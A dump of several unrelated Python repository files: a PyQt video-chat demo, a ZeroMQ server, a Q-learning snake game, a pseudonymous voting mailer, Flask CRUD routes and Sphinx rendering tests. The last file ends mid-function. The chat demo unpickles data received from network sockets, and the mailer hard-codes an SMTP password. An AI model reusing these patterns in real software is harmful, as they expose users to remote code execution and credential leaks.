self.graphics_view = QtWidgets.QGraphicsView(self.window)\n self.view_finder = Qt.QCameraViewfinder(self.window)\n self.chat_widget = QtWidgets.QListWidget(self.window)\n self.text_input = QtWidgets.QLineEdit(\"Input your text\", self.window)\n self.name_input = QtWidgets.QLineEdit(\"Input your name\", self.window)\n self.addr_input = QtWidgets.QLineEdit(\"192.168.1.\", self.window)\n self.exit_btn = QtWidgets.QPushButton(\"Exit demo\", self.window)\n self.send_msg_btn = QtWidgets.QPushButton(\"Send\", self.window)\n self.conn_btn = QtWidgets.QPushButton(\"Connect\", self.window)\n self.clear_btn = QtWidgets.QPushButton(\"Clear chat\", self.window)\n self.camera_btn = QtWidgets.QPushButton(\"Camera\", self.window)\n\n self.camera = QtMultimedia.QCamera(QtMultimedia.QCamera.availableDevices()[0])\n self.viewfinder_settings = Qt.QCameraViewfinderSettings()\n self.viewfinder_settings.setResolution(640, 480)\n self.video_probe = QtMultimedia.QVideoProbe()\n self.graphics_scene = QtWidgets.QGraphicsScene()\n self.camera.setViewfinderSettings(self.viewfinder_settings)\n self.camera.setViewfinder(self.view_finder)\n self.camera.setCaptureMode(Qt.QCamera.CaptureVideo)\n self.video_probe.setSource(self.camera)\n\n self.video_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.chat_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.frame_buffer = Qt.QBuffer()\n self.frame_buffer.open(Qt.QBuffer.ReadWrite)\n self.frame_buffer.bytesWritten.connect(self.redraw)\n self.video_th = MThread(func=self.recv_image) # Thread(target=self.recv_image)\n self.chat_th = MThread(func=self.recv_msg)\n self.video_th.start()\n self.chat_th.start()\n\n def connect_clients(self):\n # 
self.connecter.register_user('true')\n try:\n print(f\"Connecting to {self.addr_input.text()}:20000\")\n self.video_client.connect((self.addr_input.text(), 20000))\n self.chat_client.connect((self.addr_input.text(), 20004))\n # self.camera.start()\n except ConnectionError as e:\n print(e)\n\n @staticmethod\n def convert_to_rgb(data, pixel_format=19, width=640, height=480) -> np.ndarray:\n # https://maxsharabayko.blogspot.com/2016/01/fast-yuv-to-rgb-conversion-in-python-3.html\n def convertYUVtoRGB(yuv_planes: list, zoom_needed: bool):\n plane_y = yuv_planes[0]\n plane_u = yuv_planes[1]\n plane_v = yuv_planes[2]\n\n # upsample if YV12, alternativelly can perform upsampling with numpy.repeat()\n plane_u = ndimage.zoom(plane_u, 2, order=0) if zoom_needed else plane_u.repeat(2, axis=0).repeat(2, axis=1)\n plane_v = ndimage.zoom(plane_v, 2, order=0) if zoom_needed else plane_v.repeat(2, axis=0).repeat(2, axis=1)\n\n # reshape\n plane_y = plane_y.reshape((plane_y.shape[0], plane_y.shape[1], 1))\n plane_u = plane_u.reshape((plane_u.shape[0], plane_u.shape[1], 1))\n plane_v = plane_v.reshape((plane_v.shape[0], plane_v.shape[1], 1))\n\n # make YUV of shape [height, width, color_plane]\n yuv = np.concatenate((plane_y, plane_u, plane_v), axis=2)\n\n # according to ITU-R BT.709\n yuv[:, :, 0] = yuv[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = yuv[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n A = np.array([[1.164, 0.000, 1.793],\n [1.164, -0.213, -0.533],\n [1.164, 2.112, 0.000]])\n\n # our result\n return np.dot(yuv, A.T).clip(0, 255).astype('uint8')\n\n # Convert YV12 to RGB\n if pixel_format == Qt.QVideoFrame.Format_YV12:\n planes = list()\n # Y is data[:x*y]\n planes.append(np.asarray(data[:height * width], dtype=np.uint8).reshape((width, height)))\n # U is data[x*y:x*y*5/4]\n planes.append(np.asarray(data[height * width:int(height * width * 5 / 4)], dtype=np.uint8).reshape(\n (int(width / 2), int(height / 2))))\n # V is data[x*y*5/4:]\n planes.append(np.asarray(data[int(height * width * 5 / 4):], dtype=np.uint8).reshape(\n (int(width / 2), int(height / 2))))\n return convertYUVtoRGB(yuv_planes=planes, zoom_needed=True)\n\n # Convert YUYV to RGB\n elif pixel_format == Qt.QVideoFrame.Format_YUYV:\n planes = list()\n return convertYUVtoRGB(yuv_planes=planes, zoom_needed=False)\n\n def window_ui(self, window: QtWidgets.QMainWindow, window_size: tuple = (640, 540)):\n window.resize(*window_size)\n self.graphics_view.setStyleSheet(\"background-color: grey\")\n\n # Geometry\n self.graphics_view.setGeometry(\n int(0), int(0), int(window_size[0]*2/3), int(window_size[1]*7/9))\n self.view_finder.setGeometry(\n int(int(window_size[0]*2/3)), int(0), int(int(window_size[0]/3)), int(window_size[1]*2/9))\n self.chat_widget.setGeometry(\n int(window_size[0]*2/3), int(window_size[1]*2/9), int(window_size[0]/3), int(window_size[1]*5/9))\n self.exit_btn.setGeometry(\n 0, int(window_size[1]*7/9), int(window_size[0]*2/3), int(window_size[1]*1/9))\n\n self.text_input.setGeometry(\n int(window_size[0]*2/3), int(window_size[1]*7/9), int(window_size[0]*4/9), int(window_size[1]/9))\n self.send_msg_btn.setGeometry(\n int(window_size[0]*16/18), int(window_size[1] * 7 / 9), int(window_size[0]/9), int(window_size[1]/9))\n self.name_input.setGeometry(\n 0, int(window_size[1] * 8 / 9), int(window_size[0] / 6), int(window_size[1]/9))\n self.addr_input.setGeometry(\n int(window_size[0] / 6), int(window_size[1]*8/9), int(window_size[0]/2), int(window_size[1]/9))\n self.conn_btn.setGeometry(\n 
int(window_size[0] / 2), int(window_size[1]*8/9), int(window_size[0]/6), int(window_size[1]/9))\n self.clear_btn.setGeometry(\n int(window_size[0] * 2 / 3), int(window_size[1]*8/9), int(window_size[0] / 6), int(window_size[1]/9))\n self.camera_btn.setGeometry(\n int(window_size[0]*5/6), int(window_size[1] * 8 / 9), int(window_size[0] / 6), int(window_size[1] / 9))\n\n # Listeners\n self.conn_btn.clicked.connect(self.connect_clients)\n self.clear_btn.clicked.connect(lambda x: self.chat_widget.clear())\n self.camera_btn.clicked.connect(\n lambda x: self.camera.stop() if self.camera.status() == Qt.QCamera.StartingStatus else self.camera.start())\n self.send_msg_btn.clicked.connect(self.send_msg)\n self.exit_btn.clicked.connect(self.closeAllWindows)\n self.video_probe.videoFrameProbed.connect(self.send_image)\n self.graphics_scene.changed.connect(lambda x: self.graphics_view.setScene(self.graphics_scene))\n\n def send_image(self, frame):\n frame.map(QtMultimedia.QAbstractVideoBuffer.ReadOnly)\n bits_ptr = frame.bits()\n bits_ptr.setsize(frame.mappedBytes())\n bits_ptr = bytes(bits_ptr)\n # print(f\"Sending {len(bits_ptr)} bytes\")\n # Send it\n self.video_client.send(bits_ptr)\n\n def redraw(self):\n img = bytes(self.frame_buffer.data())\n img = self.convert_to_rgb([*img])\n self.graphics_scene.clear()\n self.graphics_scene.addPixmap(Qt.QPixmap.fromImage(\n Qt.QImage(img.data, img.shape[0], img.shape[1], img.shape[0] * img.shape[2], Qt.QImage.Format_Indexed8)))\n self.graphics_view.setScene(self.graphics_scene)\n\n def recv_image(self):\n self.video_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.video_server.bind(('', 20000))\n # print(self.video_server)\n self.video_server.listen()\n conn, addr = self.video_server.accept()\n while True:\n bits_ptr = bytes()\n while len(bits_ptr) < 640*720:\n bits_ptr += conn.recv(640*720)\n # print(len(bits_ptr), '-->', end=' ')\n self.frame_buffer.write(bits_ptr[:640*720])\n self.frame_buffer.seek(0)\n bits_ptr = bits_ptr[640*720:]\n # print(len(bits_ptr))\n\n def send_msg(self):\n msg = self.text_input.text()\n self.text_input.setText(\"\")\n self.chat_client.send(pickle.dumps(self.name_input.text()))\n self.chat_client.recv(1024)\n self.chat_client.send(pickle.dumps(msg))\n self.chat_client.recv(1024)\n self.chat_widget.addItem(\"[{}]: {}\".format(self.name_input.text(), msg))\n\n def recv_msg(self):\n self.chat_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n self.chat_server.bind(('', 20004))\n # print(self.chat_server)\n self.chat_server.listen()\n sock, addr = self.chat_server.accept()\n while True: # while True:\n name = pickle.loads(sock.recv(1024))\n sock.send(pickle.dumps(0))\n msg = pickle.loads(sock.recv(1024))\n sock.send(pickle.dumps(0))\n self.chat_widget.addItem(\"[{}]: {}\".format(name, msg))\n\n\nif __name__ == '__main__':\n app = QtypeDemo([])\n app.window_ui(app.window, (720, 540))\n app.window.show()\n exit(app.exec_())\n","repo_name":"LYttAGrt/Qtype","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":11128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73394822685","text":"\n#\n# CS361 Microservice: Server\n# Binds REP socket to tcp://*:5555\n#\n\nimport time\n# to install zeromq, run the command pip install pyzmq\nimport zmq\nimport base64\nimport random\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\nnumber_of_messages = 0\nnum = 
random.randint(1, 9)\nwith open(f\"{num}.jpg\", \"rb\") as img_file:\n my_string = base64.b64encode(img_file.read())\n print(\"copied\")\n# f = open(\"pic.bin\", \"wb\")\n# f.write(my_string)\n# f.close\n\n\nwhile number_of_messages < 1:\n # Wait for next request from client\n message = socket.recv()\n message = message.decode('utf8')\n print(f\"Received request: {message}\")\n\n # Do some 'work'\n time.sleep(1)\n\n # Send reply back to client\n socket.send(my_string)\n number_of_messages += 1","repo_name":"alyssafeutz/microservice_rough_draft","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12055156598","text":"\r\n\r\nimport threading\r\nimport turtle\r\nfrom turtle import *\r\nfrom random import randrange\r\nimport random\r\nfrom freegames import square, vector\r\nimport numpy as np\r\nfrom pynput.keyboard import Key, Controller\r\nimport time\r\n\r\n\r\nclass SnakeGameEnvironment:\r\n\r\n\r\n MATRIX_SIZE = 620\r\n SCORE = 0\r\n\r\n def __init__(self, agent, numberOfObstacles= 25):\r\n self.keyboard = Controller()\r\n self.food = vector(0, -100)\r\n self.numberOfObstacles = numberOfObstacles\r\n self.obstacles = []\r\n self.snake = [vector(10, 20), vector(10, 10), vector(10, 0)]\r\n self.aim = vector(0, -10)\r\n self.direction = 'Down'\r\n self.agent = agent\r\n self.reward = 0\r\n self.spanObstacles()\r\n self.countscore = 0\r\n\r\n\r\n def getreward(self):\r\n return SnakeGameEnvironment.SCORE\r\n\r\n def spanObstacles(self):\r\n x, y = 0, 0\r\n for i in range(self.numberOfObstacles):\r\n while (True):\r\n x = randrange(-19, 19) * 10\r\n y = randrange(-19, 19) * 10\r\n if vector(x, y) not in self.snake:\r\n break\r\n self.obstacles.append(vector(x, y))\r\n\r\n def change(self, x, y, direction):\r\n \"To Change snake direction.\"\r\n if direction in self.getAvailableDirections():\r\n self.aim.x = x\r\n self.aim.y = y\r\n self.direction = direction\r\n\r\n def inside(self, head):\r\n \"Return True if head inside boundaries.\"\r\n return -200 < head.x < 200 and -200 < head.y < 200\r\n\r\n def getCurrentState(self):\r\n head = self.snake[-1].copy()\r\n return head.x, head.y\r\n\r\n i = 0\r\n\r\n def coordinateSystemConverter(self, coord, to=\"normal\"):\r\n x, y = coord\r\n mid = int(SnakeGameEnvironment.MATRIX_SIZE / 2)\r\n if to == \"normal\":\r\n x = mid + x\r\n y = mid - y\r\n else:\r\n x = mid - x\r\n y = mid + y\r\n return (x, y)\r\n\r\n def getReward(self, tempHead):\r\n if not self.inside(tempHead) or tempHead in self.snake:\r\n return -10\r\n if tempHead == self.food:\r\n\r\n return 50\r\n return -5\r\n\r\n def getNextRewardState(self):\r\n head = self.snake[-1].copy()\r\n\r\n head.move(self.aim)\r\n reward = []\r\n for direction in SnakeGameEnvironment.MOVABLE_DIRECTION:\r\n tempHead = self.transformMove(head, direction)\r\n reward.append(self.getReward(tempHead))\r\n return reward\r\n\r\n\r\n\r\n def move(self):\r\n \"Move snake forward by one block.\"\r\n head = self.snake[-1].copy()\r\n head.move(self.aim)\r\n\r\n\r\n if not self.inside(head) or head in self.snake or head in self.obstacles:\r\n square(head.x, head.y, 9, 'blue')\r\n update()\r\n bye()\r\n SnakeGameEnvironment.i = 0\r\n self.reward = -100\r\n SnakeGameEnvironment.SCORE = SnakeGameEnvironment.SCORE + 100\r\n action = self.agent.Act(self.getState(head, self.food), self.MOVABLE_DIRECTION,\r\n self.reward, True)\r\n return\r\n else:\r\n self.snake.append(head)\r\n\r\n 
if head == self.food:\r\n\r\n i = 1\r\n while (True):\r\n self.food.x = randrange(-20, 20) * 50\r\n self.food.y = randrange(-20, 20) * 50\r\n if self.food not in self.snake or self.food not in self.obstacles:\r\n break\r\n self.reward = 500\r\n SnakeGameEnvironment.i = 0\r\n else:\r\n self.snake.pop(0)\r\n self.reward = -10\r\n action = self.agent.Act(self.getState(head, self.food), self.MOVABLE_DIRECTION,\r\n self.reward, False)\r\n self.direction = self.movableDirections(action, self.direction)\r\n self.aim = SnakeGameEnvironment.DIRECTIONS[self.direction]\r\n\r\n clear()\r\n\r\n for body in self.snake:\r\n square(body.x, body.y, 9, 'black')\r\n\r\n for obstacle in self.obstacles:\r\n square(obstacle.x, obstacle.y, 9, 'red')\r\n\r\n square(self.food.x, self.food.y, 9, 'green')\r\n # print(np.nonzero(self.rewardMatrix))\r\n # print(np.unique(self.rewardMatrix))\r\n # print(np.argwhere(self.rewardMatrix == SnakeGameEnvironment.BLACK).flatten())\r\n update()\r\n ontimer(self.move, 1)\r\n SnakeGameEnvironment.i = SnakeGameEnvironment.i + 1\r\n\r\n def changeDirection(self, direction):\r\n directions = [Key.up, Key.right, Key.down, Key.left]\r\n self.keyboard.press(directions[direction])\r\n self.keyboard.release(directions[direction])\r\n\r\n DIRECTIONS = {'Right': vector(10, 0), 'Left': vector(-10, 0), 'Up': vector(0, 10), 'Down': vector(0, -10)}\r\n\r\n def setup(self):\r\n try:\r\n setup(SnakeGameEnvironment.MATRIX_SIZE, SnakeGameEnvironment.MATRIX_SIZE,\r\n int(SnakeGameEnvironment.MATRIX_SIZE / 2) + 10, 0)\r\n hideturtle()\r\n tracer(False)\r\n listen()\r\n onkey(lambda: self.change(10, 0, 'Right'), 'Right')\r\n onkey(lambda: self.change(-10, 0, 'Left'), 'Left')\r\n onkey(lambda: self.change(0, 10, 'Up'), 'Up')\r\n onkey(lambda: self.change(0, -10, 'Down'), 'Down')\r\n self.move()\r\n done()\r\n\r\n return None\r\n except turtle.Terminator:\r\n pass\r\n\r\n def getAvailableDirections(self):\r\n if self.direction == 'Right':\r\n return ['Right', 'Up', 'Down']\r\n elif self.direction == 'Left':\r\n return ['Left', 'Up', 'Down']\r\n elif self.direction == 'Up':\r\n return ['Right', 'Up', 'Left']\r\n else:\r\n return ['Right', 'Left', 'Down']\r\n\r\n MOVABLE_DIRECTION = ['GO_LEFT', 'GO_FORWARD', 'GO_RIGHT']\r\n\r\n def movableDirections(self, movingDirection, currentDirection):\r\n # currentDirection = self.direction\r\n if currentDirection == 'Right':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Up'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Down'\r\n else:\r\n return currentDirection\r\n elif currentDirection == 'Left':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Down'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Up'\r\n else:\r\n return currentDirection\r\n elif currentDirection == 'Up':\r\n if movingDirection == 'GO_LEFT':\r\n return 'Left'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Right'\r\n else:\r\n return currentDirection\r\n else:\r\n if movingDirection == 'GO_LEFT':\r\n return 'Right'\r\n elif movingDirection == 'GO_RIGHT':\r\n return 'Left'\r\n else:\r\n return currentDirection\r\n\r\n\r\n def getNextSquareState(self, squareSpace):\r\n\r\n if not self.inside(squareSpace) or squareSpace in self.snake or squareSpace in self.obstacles:\r\n return -1\r\n if squareSpace == self.food:\r\n return 1\r\n return 0\r\n\r\n def SigNum(self, x):\r\n if x < 0:\r\n return -1\r\n if x > 0:\r\n return 1\r\n else:\r\n return 0\r\n\r\n def GetQuadrant(self, coord):\r\n (sign_x, sign_y) = (self.SigNum(coord[0]), self.SigNum(coord[1]))\r\n\r\n if sign_x == 0:\r\n qx 
= 0\r\n        elif sign_x == 1:\r\n            qx = 1\r\n        else:\r\n            qx = -1\r\n\r\n        if sign_y == 0:\r\n            qy = 0\r\n        elif sign_y == 1:\r\n            qy = 1\r\n        else:\r\n            qy = -1\r\n\r\n        return (qx, qy)\r\n\r\n    def TransformQuadrantBasedOnDirection(self, coord, d, directions):\r\n\r\n        (x, y) = coord\r\n\r\n        for direction in directions:\r\n            if d == direction:\r\n                if d == 'Left': (x, y) = (y, -x)\r\n                if d == 'Right': (x, y) = (-y, x)\r\n                if d == 'Down': (x, y) = (-x, -y)\r\n\r\n        return self.GetQuadrant((x, y))\r\n\r\n    def transformMove(self, head, movableDirection):\r\n        tempHead = head.copy()\r\n        direction = self.movableDirections(movableDirection, self.direction)\r\n        tempHead.move(SnakeGameEnvironment.DIRECTIONS[direction])\r\n        return tempHead\r\n\r\n    def getState(self, head, food):\r\n        square_description = []\r\n        fruit = food.copy()\r\n        head = head.copy()\r\n        for direction in SnakeGameEnvironment.MOVABLE_DIRECTION:\r\n            tempHead = self.transformMove(head, direction)\r\n            square_description.append(self.getNextSquareState(tempHead))\r\n        # print(head,fruit)\r\n        head = self.coordinateSystemConverter(head)\r\n        fruit = self.coordinateSystemConverter(fruit)\r\n        # print(head,fruit)\r\n        head = (head[0], -head[1])\r\n        fruit = (fruit[0], -fruit[1])\r\n\r\n        (x, y) = (fruit[0] - head[0], fruit[1] - head[1])\r\n        (qx, qy) = self.TransformQuadrantBasedOnDirection((x, y),\r\n                                                          self.direction, self.getAvailableDirections())\r\n        mapped_state = (square_description[0], square_description[1],\r\n                        square_description[2], qx, qy)\r\n        return mapped_state\r\n\r\n\r\n\r\nimport _pickle as cPickle\r\nimport math\r\nimport random\r\nimport sys\r\n\r\n\r\nclass Agent():\r\n\r\n    Q = {}\r\n\r\n    def __init__(self, epsilon, trained_file=\"\", gamma=0.9, alpha=0.8):\r\n        self.gamma = gamma\r\n        self.alpha = alpha\r\n        if epsilon == -1.0:\r\n            self.e = 0.5\r\n        else:\r\n            self.e = epsilon\r\n        self.old_state = None\r\n        self.old_action = None\r\n        self.Q = {}\r\n        self.N = {}\r\n        self.count = 0\r\n\r\n        if trained_file != \"\":\r\n            try:\r\n                (self.e, self.count, self.Q) = cPickle.load(open(trained_file, \"rb\"))\r\n            except IOError as e:\r\n                sys.stderr.write(\"File \" + trained_file + \" not found. \\n\")\r\n                sys.exit(1)\r\n\r\n        return\r\n\r\n    def UpdateQ(self, state, action, state_, action_, reward, explore):\r\n        if not state:\r\n            return\r\n\r\n        q = self.Q[state][action]\r\n        if not state_:\r\n            q += self.alpha * (reward - q)\r\n        else:\r\n            q_ = max(self.Q[state_].values())\r\n            q += self.alpha * (reward + self.gamma * q_ - q)\r\n\r\n        self.Q[state][action] = q\r\n\r\n    def Act(self, state, actions, reward, episode_ended):\r\n        self.count += 1\r\n\r\n        # print(actions,rewards)\r\n        if self.count == 10000:\r\n            self.e -= self.e / 20\r\n            self.count = 1000\r\n\r\n        # epsilon-greedy\r\n        if state not in self.Q:\r\n            self.Q[state] = {}\r\n            print(\"New snake arrived\")\r\n            for action in actions:\r\n                self.Q[state][action] = 10\r\n\r\n        # Explore\r\n        fg = random.random()\r\n        # print(fg , self.e)\r\n        if fg < self.e:\r\n            action = actions[random.randint(0, len(actions) - 1)]\r\n            explore = True\r\n\r\n        else:\r\n            action = max(actions, key=lambda x: self.Q[state][x])\r\n            explore = False\r\n\r\n        if episode_ended:\r\n            self.UpdateQ(self.old_state, self.old_action, None, None, reward,\r\n                         explore)\r\n        else:\r\n            self.UpdateQ(self.old_state, self.old_action, state, action, reward,\r\n                         explore)\r\n\r\n        self.old_state = state\r\n        self.old_action = action\r\n        return action\r\n\r\n    def WriteKnowledge(self, filename):\r\n        fp = open(filename, \"wb\")\r\n        cPickle.dump((self.e, self.count, self.Q), fp)\r\n        fp.close()\r\n        return\r\n\r\n\r\nif __name__ == '__main__':\r\n    agent = Agent(0.5)\r\n\r\n    for i in range(2000):\r\n        game = SnakeGameEnvironment(agent)\r\n        game.setup()\r\n        # print(agent.Q)\r\n        # input(\"hi\")\r\n        print(\"My score is: \", game.getreward())\r\n    f = open(\"temp.pkl\", 'wb')\r\n    cPickle.dump(agent.Q, f)\r\n    f.close()\r\n","repo_name":"yadagirianjali13/AI_Final-project","sub_path":"Q Learning.py","file_name":"Q Learning.py","file_ext":"py","file_size_in_byte":12274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"39705322331","text":"# 1D1P Day350 BOJ 1919 (Making an Anagram) problem - 2021.10.20\n\ndef count(string):\n    arr = [0] * 26\n    for i in range(ord('a'), ord('z')+1):\n        cnt = 0\n        for digit in string:\n            if digit == chr(i):\n                cnt += 1\n        arr[i-ord('a')] = cnt\n\n    return arr\n\na = list(input())\nb = list(input())\na.sort()\nb.sort()\na_count = count(a)\nb_count = count(b)\n\nanswer = 0\nfor i in range(26):\n    answer += abs(a_count[i] - b_count[i])\n\nprint(answer)","repo_name":"WonHwang/1D1P","sub_path":"2021_10_20_Day350/1919.py","file_name":"1919.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"20456672200","text":"#!/usr/bin/python3\n\n# https://myaccount.google.com/lesssecureapps\n\nfrom random import SystemRandom\n\nimport smtplib, ssl\nimport time\n\nfrom collections import namedtuple\n\nsender = \"pseudo@infoaed.ee\"\nbulletin = \"https://etherpad.wikimedia.org/p/psephos-demosia\"\n\nmessage_template = \"\"\"From: Uduloor <%s>\nTo: %s\nSubject: Your pseudonym for voting at the upcoming election\n\nYour pseudonym for voting at the upcoming election is:\n\n* %s\n\nVoting takes place at:\n\n* %s\n\nGuidelines in a nutshell:\n\n* To cast your vote, please write down your pseudonym followed by your choice at the election.\n* Make sure you write this information on a separate line at the bulletin board to avoid any confusion.\n* To preserve your anonymity in this secret election you *should not* log in to the bulletin board.\n* For 
extra caution you can use the private mode of your web browser or even special anonymity preserving browser.\n* Before voting is closed, please make sure your vote is still correctly displayed at the bulletin board.\n* After voting is closed you (or actually anyone) can tally the votes to make sure everything was done correctly.\n\nHappy voting!\n\nSincereley \"etc\"\nUduloor\n\"\"\"\n\nvoters_in_text = \"\"\"tramm@infoaed.ee\nboamaod@gmail.com\ntramm@p6drad-teel.net\ntramm@wikimedia.ee\n\"\"\"\n\nunique_words = \"\"\"narcissus\ntaraxacum\ntulipa\nrhododendron\npapaver\nmimosa\niris\nasparagus\nanemone\nalcea\nhepatica\ntrollius\nranunculus\ncaltha\nrosa\ntrifolium\nmelampyrum\nsyringa\nsolanum\nligularia\ncurcuma\nantirrhinum\n\"\"\"\n\ncode_range = range(100, 999)\n\nDRY_RUN = True\n\nurl = \"smtp.gmail.com\"\nport = 465\nusername = \"boamaod\"\npassword = \"secret123\"\n\npseudo_id = namedtuple('pseudo_id', ['pseudonym', 'code', 'cryptonym'])\n\nvoter_list = voters_in_text.strip().splitlines()\nword_list = unique_words.strip().splitlines()\n\nrandom = SystemRandom()\n\nrandom_words = random.sample(word_list, len(voter_list))\nrandom_keys = random.sample(code_range, len(voter_list))\n\nprint(\"There are %d voters in upcoming election:\\n\" % len(voter_list))\n\nfor voter in voter_list:\n print(voter)\n\nrandom.shuffle(voter_list)\n\nprint()\n\nprint(\"Distributing pseudonyms...\\n\")\n\npseudo = []\n\nfor i in range(len(voter_list)):\n current = pseudo_id(random_words[i], str(random_keys[i]), random_words[i] + str(random_keys[i]))\n pseudo.append(current)\n\ni = -1\n\ntry:\n \n if not DRY_RUN: \n server = smtplib.SMTP_SSL(url, port, context=ssl.create_default_context())\n server.login(username, password)\n \n for i in range(len(voter_list)):\n\n receiver = voter_list[i].split()[0]\n message = message_template % (sender, receiver, pseudo[i].cryptonym, bulletin)\n \n print(\"*\", pseudo[i].pseudonym)\n \n if not DRY_RUN:\n server.sendmail(sender, receiver, message.encode(\"utf8\"))\n \n time.sleep(1)\n \n if not DRY_RUN:\n server.quit()\n \n print()\n \n print(\"Delivered %d pseudonyms.\" % (i+1))\n \nexcept Exception as e:\n\n print(\"Delivered %d pseudonyms.\" % (i+1))\n \n print(\"ERROR:\", e)\n\nprint()\n\nprint(\"Write 'end' to close voting and publish audit information.\")\n\nprint()\n\nwhile(input(\"> \") != \"end\"):\n pass\n\nprint()\nprint(\"Cryptonyms:\")\n\nprint()\n\nfor i in range(len(voter_list)):\n print(\"*\", pseudo[i].cryptonym)\n\nprint()\n\nprint(\"Thanks for taking digital democracy seriously!\")\n","repo_name":"infoaed/uduloor","sub_path":"uduloor.py","file_name":"uduloor.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"27903765093","text":"from flask import jsonify, redirect\nfrom models import db, Participant\n\ndef get_all_participants(): \n all_participants = Participant.query.all()\n results = [participant.as_dict() for participant in all_participants]\n return jsonify(results)\n\ndef get_participant(id):\n participant = Participant.query.get(id) \n if participant: \n return jsonify(participant.as_dict())\n else:\n raise Exception(f'No participant at id: {id}') \n\ndef create_participant(**form_kwargs):\n new_participant = Participant(**form_kwargs)\n db.session.add(new_participant)\n db.session.commit()\n return jsonify(new_participant.as_dict())\n\ndef update_participant(id, **update_values): \n participant = Participant.query.get(id) \n if participant:\n 
for key, value in update_values.items():\r\n            setattr(participant, key, value)\r\n        db.session.commit()\r\n        return jsonify(participant.as_dict())\r\n    else:\r\n        raise Exception(f'No participant at id: {id}')\r\n\r\n\r\n\r\ndef destroy_participant(id):\r\n    participant = Participant.query.get(id)\r\n    if participant:\r\n        db.session.delete(participant)\r\n        db.session.commit()\r\n        return redirect('/participants')\r\n    else:\r\n        raise Exception(f'No participant at id: {id}')","repo_name":"smashflashtech/ASDDC-backend","sub_path":"crud/participant_crud.py","file_name":"participant_crud.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"}
+{"seq_id":"11088155343","text":"from PySide6 import QtCore, QtGui, QtWidgets\nfrom joulescope_ui import pubsub_singleton, N_, register, get_instance, get_unique_id, get_topic_name\n\n\ndef settings_action_create(obj, menu):\n    def on_action():\n        pubsub_singleton.publish('registry/settings/actions/!edit', obj)\n\n    action = QtGui.QAction(menu)\n    action.setText(N_('Settings'))\n    action.triggered.connect(on_action)\n    menu.addAction(action)\n    return action\n","repo_name":"jetperch/pyjoulescope_ui","sub_path":"joulescope_ui/widget_tools.py","file_name":"widget_tools.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"86"}
+{"seq_id":"15075682332","text":"from __future__ import (print_function, division, unicode_literals,\n                        absolute_import)\n\nimport sys\n\nimport pytest\n\n\nif sys.version_info[0] < 3:\n    sip = pytest.importorskip('sip')\n    sip.setapi('QString', 2)\n    text_type = unicode\nelse:\n    text_type = str\n\nQtCore = pytest.importorskip('PyQt4.QtCore')\nQtGui = pytest.importorskip('PyQt4.QtGui')\nQtWebKit = pytest.importorskip('PyQt4.QtWebKit')\n\n\n# Qt application setup and rendering takes time, these tests are slow\npytestmark = pytest.mark.slow\n\n\ndef pytest_funcarg__app(request):\n    \"\"\"\n    Application with mocked lookup.\n    \"\"\"\n    request.applymarker(pytest.mark.mock_lookup)\n    return request.getfuncargvalue('app')\n\n\ndef pytest_funcarg__qt_app(request):\n    \"\"\"\n    A QApplication to drive rendering tests.\n    \"\"\"\n    return request.cached_setup(lambda: QtGui.QApplication([]), scope='module')\n\n\ndef pytest_funcarg__web_page(request):\n    \"\"\"\n    Return a web page object for the rendered ``content``.\n    \"\"\"\n    request.getfuncargvalue('qt_app')\n    # keep the web page alive during execution of the current test. Prevents\n    # the python GC from cleaning the web_page object at the end of this\n    # function and thus prevents segfaults when accessing elements in the page.\n    web_page = request.cached_setup(QtWebKit.QWebPage, scope='function')\n    main_frame = web_page.mainFrame()\n    index_html_file = request.getfuncargvalue('index_html_file')\n    # wait for \"loadFinished\" signal to make sure that the whole content is\n    # parsed before we run the test. see\n    # http://www.developer.nokia.com/Community/Wiki/How_to_wait_synchronously_for_a_Signal_in_Qt\n    loop = QtCore.QEventLoop()\n    main_frame.loadFinished.connect(loop.quit)\n    main_frame.load(QtCore.QUrl(text_type(index_html_file)))\n    loop.exec_()\n    return web_page\n\n\ndef pytest_funcarg__reference(request):\n    \"\"\"\n    Return the issue reference element in the ``main_frame``.\n    \"\"\"\n    web_page = request.getfuncargvalue('web_page')\n    issue_element = web_page.mainFrame().findFirstElement('.xref.issue')\n    if issue_element.isNull():\n        raise ValueError('null element')\n    return issue_element\n\n\ndef pytest_funcarg__text_decoration(request):\n    \"\"\"\n    Return the ``text-decoration`` style property of the ``reference`` element.\n    \"\"\"\n    reference = request.getfuncargvalue('reference')\n    resolve_strategy = QtWebKit.QWebElement.CascadedStyle\n    return reference.styleProperty('text-decoration', resolve_strategy)\n\n\n@pytest.mark.with_issue(id='10', title='Eggs', closed=False, url='eggs')\ndef test_open_issue(text_decoration):\n    \"\"\"\n    Test that an open issue is not struck through.\n    \"\"\"\n    assert not text_decoration\n\n\n@pytest.mark.with_issue(id='10', title='Eggs', closed=True, url='eggs')\ndef test_closed_issue(text_decoration):\n    